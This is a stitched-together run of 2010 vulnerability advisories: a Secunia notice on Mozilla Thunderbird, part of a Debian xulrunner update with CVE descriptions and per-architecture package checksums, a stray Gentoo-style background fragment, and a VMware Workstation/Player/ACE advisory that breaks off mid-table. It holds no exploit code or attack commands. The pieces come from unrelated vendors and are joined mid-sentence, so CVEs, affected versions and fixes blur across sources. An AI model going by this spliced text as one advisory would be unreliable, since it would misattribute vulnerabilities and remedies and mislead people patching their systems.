ID:\nSA40642\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/40642/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=40642\n\nRELEASE DATE:\n2010-07-22\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/40642/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/40642/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=40642\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nSome weaknesses and vulnerabilities have been reported in Mozilla\nThunderbird, which can be exploited by malicious people to disclose\npotentially sensitive information, potentially conduct cross-site\nscripting attacks, bypass certain security restrictions, and\ncompromise a user\u0027s system. \n\nFor more information:\nSA39925\n\nSOLUTION:\nUpdate to Thunderbird 3.0.6 and 3.1.1. \n\nORIGINAL ADVISORY:\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-34.html\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-38.html\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-39.html\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-40.html\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-41.html\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-42.html\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-43.html\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-44.html\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-46.html\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-47.html\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\nCVE-2010-1208\n\n \"regenrecht\" discovered that incorrect memory handling in DOM\n parsing could lead to the execution of arbitrary code. \n\nCVE-2010-1211\n\n Jesse Ruderman, Ehsan Akhgari, Mats Palmgren, Igor Bukanov, Gary\n Kwong, Tobias Markus and Daniel Holbert discovered crashes in the\n layout engine, which might allow the execution of arbitrary code. \n\nCVE-2010-2751\n\n Jordi Chancel discovered that the location could be spoofed to\n appear like a secured page. \n\nCVE-2010-2753\n\n \"regenrecht\" discovered that incorrect memory handling in XUL\n parsing could lead to the execution of arbitrary code. \n\nCVE-2010-2754\n\n Soroush Dalili discovered an information leak in script processing. \n\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 1.9.0.19-3. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.9.1.11-1. \n\nFor the experimental distribution, these problems have been fixed in\nversion 1.9.2.7-1. \n\nWe recommend that you upgrade your xulrunner packages. \n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.19-3.diff.gz\n Size/MD5 checksum: 149955 e6ec4540373a8dfbea5c1e63f5b628b2\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.19-3.dsc\n Size/MD5 checksum: 1755 59f9033377f2450ad114d9ee4367f9c7\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.19.orig.tar.gz\n Size/MD5 checksum: 44174623 83667df1e46399960593fdd8832e958e\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.9.0.19-3_all.deb\n Size/MD5 checksum: 1466246 a3b5c8b34df7e2077a5e3c5c0d911b85\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_alpha.deb\n Size/MD5 checksum: 165496 ad7c134eeadc1a2aa751c289052d32f1\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_alpha.deb\n Size/MD5 checksum: 433152 57f7a88c05eece5c0ea17517646267bb\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_alpha.deb\n Size/MD5 checksum: 72550 b581302383396b57f7e07aa4564245b3\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_alpha.deb\n Size/MD5 checksum: 51155444 37595efd28303ec3a88d294b58c1e7aa\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_alpha.deb\n Size/MD5 checksum: 9487312 452f2c3b26bb249711720ade76e77c3f\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_alpha.deb\n Size/MD5 checksum: 223422 9ce6e6f35412321405c27618a3550763\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_alpha.deb\n Size/MD5 checksum: 113478 f4946488381af317acb3bd27da3e372e\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_alpha.deb\n Size/MD5 checksum: 940250 abb2d020d4cce2e5547d17dd94323cee\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_alpha.deb\n Size/MD5 checksum: 3357434 a26b339fee481f1ae5494ee0983e3e75\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_amd64.deb\n Size/MD5 checksum: 50381710 4e6df9133e326ca7fe1d91adab87609b\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_amd64.deb\n Size/MD5 checksum: 3291324 01a75923a6b796c2e1f3c02e4584072f\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_amd64.deb\n Size/MD5 checksum: 152266 0a9e05d5e36920cf9cb6c9e39357679b\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_amd64.deb\n Size/MD5 checksum: 7735106 eedecb0183cd911bf7416be5f61cf88e\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_amd64.deb\n Size/MD5 checksum: 374604 7a71d4ce527727f43225fc1cdc6b3915\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_amd64.deb\n Size/MD5 checksum: 70226 f8860e988f030333c59f893582e17da0\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_amd64.deb\n Size/MD5 checksum: 890738 0db2e5b458ae1495dce575688a27ef2a\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_amd64.deb\n Size/MD5 checksum: 223326 1d128ae917c5dab4e977ffb018cb704c\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_amd64.deb\n Size/MD5 checksum: 101830 2bb9a62d6454d0b7ef6da98cc07b4013\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_arm.deb\n Size/MD5 checksum: 140950 d9044d5f823661f4a1ef11c47971d6e2\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_arm.deb\n Size/MD5 checksum: 3584768 6ff8221347684a334d6f358d2c8f2dcc\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_arm.deb\n Size/MD5 checksum: 6802070 e489c87976c243d040f568a8e04a7466\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_arm.deb\n Size/MD5 checksum: 351056 dd61fc5b425e296ef00120b4cfbc5604\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_arm.deb\n Size/MD5 checksum: 68552 819703fc0550ee6473572ea3655ab1f5\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_arm.deb\n Size/MD5 checksum: 84224 f3915220a86a6a31e48b845d2af7f249\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_arm.deb\n Size/MD5 checksum: 222376 cb0563f3e5220ceb6f42b8e6471eb883\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_arm.deb\n Size/MD5 checksum: 49349776 4037a4ab7eeb964c24c95fbb905edbe6\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_arm.deb\n Size/MD5 checksum: 815334 c055e242c82b7643c67712602e4f3215\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_armel.deb\n Size/MD5 checksum: 822978 f8609edb961b6c71732c17575393644a\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_armel.deb\n Size/MD5 checksum: 6962470 fc143ac75279405ef99a3e045439adeb\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_armel.deb\n Size/MD5 checksum: 3583846 db81fc2e4c8a30fbaf0b176f6d7e77a5\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_armel.deb\n Size/MD5 checksum: 142446 016a6aa2efa9e49788c97bc925d90bbb\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_armel.deb\n Size/MD5 checksum: 353294 65f40d8a434c6b430685ef1a54246888\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_armel.deb\n Size/MD5 checksum: 50182030 97009b62c3d65b5e715f363d7a5a2e0c\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_armel.deb\n Size/MD5 checksum: 223380 30fd707dea85e43894c84036115920a3\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_armel.deb\n Size/MD5 checksum: 70694 e5892c32e9850d86138ebf15ad317b63\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_armel.deb\n Size/MD5 checksum: 84758 a94402fed374f82a1ffeb338cb2a4cbb\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_hppa.deb\n Size/MD5 checksum: 223614 ea284c98cc97b10b879d6174b81cb486\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_hppa.deb\n Size/MD5 checksum: 899460 290c89b8835d773b8fd240f5610dc63c\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_hppa.deb\n Size/MD5 checksum: 72280 1d32724f444212696e28d15dc22386af\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_hppa.deb\n Size/MD5 checksum: 413386 e78a2aabb581f3f7f8da9cb531d6a883\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_hppa.deb\n Size/MD5 checksum: 158762 89855347fdf8833df8fd643cfd6a2f10\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_hppa.deb\n Size/MD5 checksum: 51267722 b51b03ef591a26a4bb72fb0c58e610c0\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_hppa.deb\n Size/MD5 checksum: 3632562 2d9a207f01319a7bd8f3eb72b3762c77\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_hppa.deb\n Size/MD5 checksum: 9523510 0f38b76b0074881d4b12823eedc40846\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_hppa.deb\n Size/MD5 checksum: 106998 32d701f55bd4cc6e0f7160c3b5db43aa\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_i386.deb\n Size/MD5 checksum: 49553140 cd9fb750075df895e2ad46a8fe4c8bdf\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_i386.deb\n Size/MD5 checksum: 852228 f04ee6f2c26e9bda77477d64a13f3c53\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_i386.deb\n Size/MD5 checksum: 79554 e69019a20fc3e8750faf73961cae8a38\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_i386.deb\n Size/MD5 checksum: 224454 c7e441828615fa66d9907b6407a2b1ad\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_i386.deb\n Size/MD5 checksum: 351828 85e4711445491850841c2f05102f2bd2\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_i386.deb\n Size/MD5 checksum: 6609818 b99e5d5f75686adcea1c3570fb82ead5\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_i386.deb\n Size/MD5 checksum: 3573826 2869c274453928b8b110d8aee7dcba96\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_i386.deb\n Size/MD5 checksum: 142966 847a37421b7980378c81c5e818c2df3d\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_i386.deb\n Size/MD5 checksum: 68968 1eee7343caee6a8a23a141bf6b653fa4\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_ia64.deb\n Size/MD5 checksum: 224078 a9dc6949ac6ef39884d1cb58929e20fc\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_ia64.deb\n Size/MD5 checksum: 3693822 602f37b927bc425803730a66d17e8bec\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_ia64.deb\n Size/MD5 checksum: 542370 6015bef0d96154f73c32b2031c8bbf70\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_ia64.deb\n Size/MD5 checksum: 77166 1a94ec379b6e210cf35c1116939fc5f7\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_ia64.deb\n Size/MD5 checksum: 813100 d0cdc640bf4a68973942cf563b7f7d7b\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_ia64.deb\n Size/MD5 checksum: 181192 54ef9505c0b0a0b62539dc3d983a8f83\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_ia64.deb\n Size/MD5 checksum: 11340432 b833d183a5337231c512aba60e733213\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_ia64.deb\n Size/MD5 checksum: 49734538 21b8086eb33e228f4a3800307a721558\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_ia64.deb\n Size/MD5 checksum: 121688 1e8f51c8c5d1097d5c0e4b8fd6743ec7\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_mips.deb\n Size/MD5 checksum: 3611102 8f2980b314f14ff7cf1c244ed11ee638\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_mips.deb\n Size/MD5 checksum: 145574 f38aa4d16323e517d075d1de833a7a35\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_mips.deb\n Size/MD5 checksum: 380888 73bf50fdf8fd49a2251f3c13db9e0a2c\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_mips.deb\n Size/MD5 checksum: 7677088 d034f72357eb3276850bea226dfc3489\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_mips.deb\n Size/MD5 checksum: 96932 9c55e0f731b1a507e77abb54ea7c2b08\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_mips.deb\n Size/MD5 checksum: 223126 cc6d3e47d51d4a15cd05ef6af47560c2\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_mips.deb\n Size/MD5 checksum: 51902590 b9cafda15eba1ae28b5b054bd82e9d62\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_mips.deb\n Size/MD5 checksum: 919306 764f458b99647036fbdb1b36768e9b99\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_mips.deb\n Size/MD5 checksum: 70412 c674d096e73e7f353733e502bbc9cd05\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_mipsel.deb\n Size/MD5 checksum: 378984 c66e5ff8815e2386755ece9c9a34b820\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_mipsel.deb\n Size/MD5 checksum: 50034074 88479753fa54a417df183b78d0bb6ed1\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_mipsel.deb\n Size/MD5 checksum: 145324 a801aeefc7fbf555ab407eaeb4c35295\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_mipsel.deb\n Size/MD5 checksum: 70170 3145be02d89d6e205de5d89b269b9d8d\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_mipsel.deb\n Size/MD5 checksum: 3311114 4dac1eff7f53b49976d984606e76afe6\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_mipsel.deb\n Size/MD5 checksum: 900836 6727b545324904a39f31261db59f516b\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_mipsel.deb\n Size/MD5 checksum: 97046 2953be8b2d4df3994abd68d6f95de215\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_mipsel.deb\n Size/MD5 checksum: 7384772 6666f68f98fa2cc81d9e3106c958360b\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_mipsel.deb\n Size/MD5 checksum: 223416 a3ad25d92dc8f8e09352bc1fbce07989\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_powerpc.deb\n Size/MD5 checksum: 95068 18f76fe7d470194c6320df8b42e7b09b\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_powerpc.deb\n Size/MD5 checksum: 888120 b426372622e1ac0164db3f25589a5447\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_powerpc.deb\n Size/MD5 checksum: 152544 e3b9205b45b66a3fcf4937c44897a7d8\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_powerpc.deb\n Size/MD5 checksum: 3285670 a63c4ce33c3f482584b32cfe50488700\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_powerpc.deb\n Size/MD5 checksum: 7287440 f9d042196ccedd4dfb4da6d3e45ca2b1\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_powerpc.deb\n Size/MD5 checksum: 51458688 a669258d296192b6bd48b68006f9b618\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_powerpc.deb\n Size/MD5 checksum: 223412 b900b19a182c059590bfcdb9495851ef\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_powerpc.deb\n Size/MD5 checksum: 73306 94fdad8b176e63c0c791d19a026ce4b0\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_powerpc.deb\n Size/MD5 checksum: 362778 79f1ea4633cf0147da60871533750312\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_s390.deb\n Size/MD5 checksum: 156410 6e986f5714d7052295a32253daea02a9\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_s390.deb\n Size/MD5 checksum: 73182 f3b9b343586f554ac37e5c7c8970a28a\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_s390.deb\n Size/MD5 checksum: 407006 5919961e64253609b9eacc6a31a19b87\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_s390.deb\n Size/MD5 checksum: 8401766 a23f6d0b7ac0b83997635feff3977ac2\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_s390.deb\n Size/MD5 checksum: 223402 f08c12d85314436f6331b75e2e18b1c7\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_s390.deb\n Size/MD5 checksum: 909824 8c8c3aa62be4c19e97351562dcbe1694\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_s390.deb\n Size/MD5 checksum: 3308768 50226e505e97362404ffbe3e770775fe\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_s390.deb\n Size/MD5 checksum: 105828 1e5fc5d7be3c5ab803dd71e8391c06bb\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_s390.deb\n Size/MD5 checksum: 51242096 ebae3e5b1eb3fd2d9470cbe117b8ced9\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_sparc.deb\n Size/MD5 checksum: 49406432 caf251c788fe4f76679f600bd1d7b1c0\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_sparc.deb\n Size/MD5 checksum: 70192 33434a3b887ac076d88c0a4e425b3c29\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_sparc.deb\n Size/MD5 checksum: 144136 359a3cac1ee340f79eb9a53ac65f62ed\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_sparc.deb\n Size/MD5 checksum: 7181582 4b0f8aaf9a51e7c76073afbb7ea33c6e\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_sparc.deb\n Size/MD5 checksum: 3583844 11cb9b988b9eac3564f11ed310a8d77e\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_sparc.deb\n Size/MD5 checksum: 84544 0646f157f384a6a1ffcc3052035d1789\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_sparc.deb\n Size/MD5 checksum: 350470 1c643effc57e45c6afc964f2284cda7e\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_sparc.deb\n Size/MD5 checksum: 223260 77281a13fcc78aacd93cf479621ccf74\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_sparc.deb\n Size/MD5 checksum: 821854 32eba751571daa1dcd4db30e7a3b7b2c\n\n\n These files will probably be moved into the stable distribution on\n its next update. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. \n\nBackground\n==========\n\nAMD64 x86 emulation base libraries provides pre-compiled 32-bit\nlibraries. They are included in this advisory for the\nsake of completeness. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\n VMware Security Advisory\n\nAdvisory ID: VMSA-2010-0014\nSynopsis: VMware Workstation, Player, and ACE address several\n security issues. \nIssue date: 2010-09-23\nUpdated on: 2010-09-23 (initial release of advisory)\nCVE numbers: CVE-2010-3277 CVE-2010-1205 CVE-2010-0205\n CVE-2010-2249 CVE-2010-0434 CVE-2010-0425\n- ------------------------------------------------------------------------\n\n1. Summary\n\n VMware Workstation and Player address a potential installer security\n issue and security issues in libpng. VMware ACE Management Server\n (AMS) for Windows updates Apache httpd. \n\n2. Relevant releases\n\n VMware Workstation 7.1.1 and earlier,\n VMware Player 3.1.1 and earlier,\n VMware ACE Management Server 2.7.1 and earlier,\n\n Note: VMware Server was declared End Of Availability on January 2010,\n support will be limited to Technical Guidance for the duration\n of the support term. \n\n3. Problem Description\n\n a. VMware Workstation and Player installer security issue\n\n The Workstation 7.x and Player 3.x installers will load an index.htm\n file located in the current working directory on which Workstation\n 7.x or Player 3.x is being installed. This may allow an attacker to\n display a malicious file if they manage to get their file onto the\n system prior to installation. \n\n The issue can only be exploited at the time that Workstation 7.x or\n Player 3.x is being installed. Installed versions of Workstation and\n Player are not affected. The security issue is no longer present in\n the installer of the new versions of Workstation 7.x and Player 3.x\n (see table below for the version numbers). \n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2010-3277 to this issue. \n\n VMware would like to thank Alexander Trofimov and Marc Esher for\n independently reporting this issue to VMware. \n\n The following table lists what action remediates the vulnerability\n (column 4) if a solution is available. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch\n ============= ======== ======= =================\n VirtualCenter any Windows not affected\n\n Workstation 7.x any 7.1.2 build 301548 or later *\n Workstation 6.5.x any not affected\n\n Player 3.x any 3.1.2 build 301548 or later *\n Player 2.5.x any not affected\n\n AMS any any not affected\n\n Server any any not affected\n\n Fusion any Mac OS/X not affected\n\n ESXi any ESXi not affected\n\n ESX any ESX not affected\n\n * Note: This only affects the installer, if you have a version of\n Workstation or Player installed you are not vulnerable. Third party libpng updated to version 1.2.44\n\n A buffer overflow condition in libpng is addressed that could\n potentially lead to code execution with the privileges of the\n application using libpng. Two potential denial of service issues\n are also addressed in the update. \n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-1205, CVE-2010-0205, CVE-2010-2249\n to these issues. \n\n The following table lists what action remediates the vulnerability\n (column 4) if a solution is available. \n\n\n VMware Product Running Replace with/\n Product Version on Apply Patch\n ============= ======== ======= =================\n VirtualCenter any Windows not affected\n\n Workstation 7.1.x any 7.1.2 build 301548 or later\n Workstation 6.5.x any affected, patch pending\n\n Player 3.1.x any 3.1.2 build 301548 or later\n Player 2.5.x any affected, patch pending\n\n AMS any any not affected\n\n Server any any affected, no patch planned\n\n Fusion any Mac OS/X not affected\n\n ESXi any ESXi not affected\n\n ESX any ESX not affected\n\n\n c. VMware ACE Management Server (AMS) for Windows updates Apache httpd\n version 2.2.15. \n\n A function in Apache HTTP Server when multithreaded MPM is used\n does not properly handle headers in subrequests in certain\n circumstances which may allow remote attackers to obtain sensitive\n information via a crafted request that triggers access to memory\n locations associated with an earlier request. \n\n The Apache mod_isapi module can be forced to unload a specific\n library before the processing of a request is complete, resulting\n in memory corruption. \n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-0434 and CVE-2010-0425 to the\n issues addressed in this update. \n\n Column 4 of the following table lists the action required to\n remediate the vulnerability in each release, if a solution is\n available. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch\n ============= ======== ======= =================\n VirtualCenter any Windows not affected\n\n Workstation any any not affected\n\n Player any any not affected\n\n AMS any Windows 